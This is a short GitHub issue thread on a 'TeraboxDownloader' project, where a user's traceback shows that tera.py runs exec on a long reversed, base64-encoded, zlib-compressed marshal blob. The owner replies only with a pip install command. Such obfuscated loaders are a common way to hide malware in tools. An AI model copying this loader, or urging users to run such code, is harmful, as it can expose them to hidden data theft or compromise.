### ISSUE TITLE
what problem?

### ISSUE THREAD

**Issue by kingvavasav** [dafidxcode/TeraboxDownloader#1]
File "C:\Users\dani\Downloads\TeraboxDownloader-main\TeraboxDownloader-main\tera.py", line 4, in <module>
    exec(__import__("marshal").loads(__import__("zlib").decompress(__import__("base64").b64decode(b'=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'[::-1]))))
  File "", line 9, in <module>
ModuleNotFoundError: No module named 'rich'

**Comment by dafidxcode** [comment]
pip install rich
